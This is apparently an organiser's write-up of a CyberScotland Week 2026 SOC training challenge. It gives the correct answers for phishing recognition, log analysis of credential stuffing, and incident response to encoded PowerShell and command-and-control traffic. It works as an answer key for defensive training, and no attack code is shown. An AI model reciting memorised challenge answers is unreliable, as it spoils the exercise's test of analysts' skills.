Scotland Cyber Week SOC Challenge – Full Technical Breakdown
Scotland Cyber Week SOC Challenge – Full Technical Breakdown
During CyberScotland Week 2026, we ran the SOC Investigation Challenge, an online investigation exercise designed to simulate the workflow of a Security Operations Centre (SOC) analyst responding to a developing cyber incident.
Participants progressed through three levels of increasing difficulty, starting with basic threat identification and progressing to full incident response. The challenge was set within a fictional organisation called Technical Solutions Limited, where participants investigated suspicious emails, abnormal login activity, and malware alerts.
Each stage reflected how real-world incidents often unfold in a SOC environment.
Level 1 - First Alert
The first stage introduced participants to the initial indicators of compromise, focusing on phishing and basic cyber security awareness.
Participants were presented with several emails and asked to identify which ones were malicious.
Q1 - Phishing Email Identification
Two of the emails in the challenge were phishing attempts designed to trick users into revealing their credentials.
Indicators of phishing included:
- Suspicious sender domains
- Links directing users to external login portals
- Urgent requests for password resets
- Domains designed to mimic legitimate services
Correct Answers
The phishing emails were:
Email A – Fake IT password reset request Email C – Fake Microsoft security alert
Both messages attempted to convince the user to verify their account through suspicious links.
Example phishing emails used in the challenge encouraging users to reset or verify credentials.
Q2 - Password Awareness
Participants were also asked to identify the weakest password.
Correct Answer
Password123
This password is extremely weak because:
- It is commonly used
- It follows predictable patterns
- It can easily be cracked through dictionary attacks
Strong passwords should include:
- A mix of characters
- Random structure
- High entropy
Q3 - Suspicious URL Identification
Participants were shown several URLs and asked which ones were suspicious.
Suspicious URLs
https://micros0ft-login.co
https://microsoft-secure-login.com.ru
Indicators of malicious URLs included:
- Typosquatting (micros0ft instead of microsoft)
- Unusual domain endings
- Domains designed to impersonate trusted services
The legitimate Microsoft login URL is: https://login.microsoftonline.com
Level 2 - SOC Investigation
In the second tier, participants moved into SOC analyst territory, reviewing authentication logs after suspicious login activity was detected overnight.
Technical Solutions Limited detected multiple failed login attempts followed by a successful VPN login.
Participants were asked to analyse the evidence pack and answer several questions.
Q1 - What is the attacker IP address?
Correct Answer
185.92.220.14
Analysis of the logs showed repeated failed login attempts originating from this IP address followed by a successful authentication.
From a SOC perspective, this IP address would be flagged as a potential indicator of compromise (IOC).
Q2 - Which user account was compromised?
Correct Answer
j.smith
The logs showed that after several failed authentication attempts, the attacker successfully logged in using the j.smith account.
Indicators included:
- Successful VPN login event
- Authentication from a previously unseen IP address
- Activity occurring outside typical working hours
Successful VPN Login Event
Q3 - What type of attack occurred?
Correct Answer
Credential stuffing
Credential stuffing occurs when attackers attempt to authenticate using username and password combinations obtained from previous data breaches.
Evidence supporting this classification included:
- Authentication attempts across multiple accounts
- Low attempt volume per account
- Eventual success using a valid credential pair
The evidence showed login attempts against several accounts, consistent with credential stuffing.
Level 3 — Incident Response
The final stage simulated a live security incident following the compromised VPN access.
Participants were provided with endpoint detection alerts and logs indicating suspicious activity on an internal workstation.
Incident Overview
After gaining VPN access, the attacker began performing post-compromise activity on the compromised system.
The attack sequence included:
- VPN access using compromised credentials
- Download of a suspicious ISO file
- Execution of encoded PowerShell commands
- Outbound communication with an external host
- Access to sensitive finance files
This sequence represents a common attacker workflow following initial access.
Q1 - Which stage of the cyber kill chain best describes this activity?
Correct Answer
Execution / Command & Control
The encoded PowerShell command represents malicious code execution on the endpoint.
PowerShell is frequently abused by attackers due to its ability to execute scripts and interact with system components.
Following execution, the system also began communicating with an external server, indicating command and control activity.
PowerShell Execution Log
Q2 - Which TWO actions should be taken immediately?
Correct Answers
- Isolate the affected host
- Reset the user’s credentials
These actions represent immediate containment steps during incident response.
Host Isolation
Isolating the compromised device prevents:
- Further command and control communication
- Additional attacker activity
- Lateral movement across the network
Credential Reset
Resetting the compromised account prevents the attacker from maintaining VPN access.
Q3 - What Happened?
A strong response included the following sequence:
- The attacker gained VPN access using compromised credentials belonging to j.smith
- A malicious ISO file was downloaded
- Encoded PowerShell commands were executed
- The infected host established outbound connections to an external IP address
- Sensitive finance files were accessed
This demonstrates an understanding of the full attack chain.
Q4 - Who Was Affected?
User Account: j.smith
Affected Device: WS-JSMITH-01
Organisation: Technical Solutions Limited
Identifying affected systems and users is critical for incident scoping.
Q5 - Recommended Next Steps
Participants were asked to recommend longer-term remediation actions.
Acceptable responses included:
- Conducting a forensic investigation of the compromised host
- Enforcing multi-factor authentication (MFA)
- Blocking malicious IP addresses
- Reviewing authentication logs across the organisation
- Providing phishing awareness training
These actions help reduce the risk of similar attacks in the future.
Incident Timeline Summary
The simulated attack followed a realistic progression:
- Phishing email leads to credential compromise
- Credential stuffing used to access VPN
- Malicious PowerShell execution
- Command and control communication established
- Sensitive finance data accessed
- Attempted lateral movement
Key Learning Points
The challenge highlighted several important security principles:
- The importance of recognising phishing attacks
- Understanding the difference between brute force and credential stuffing
- Identifying malicious PowerShell execution
- Prioritising containment during incident response
- Correlating logs across multiple systems
These are core skills used daily by Security Operations Centre analysts.
Final Thoughts
The SOC Challenge was designed to give participants practical exposure to the analytical thinking required in modern cyber security operations.
Rather than relying on isolated alerts, participants needed to analyse evidence, understand attacker behaviour, and respond appropriately.
We were extremely pleased with the engagement and the quality of responses submitted.
Thank you to everyone who took part in this year’s challenge and we look forward to running more cyber security exercises in the future.
Author: David Billote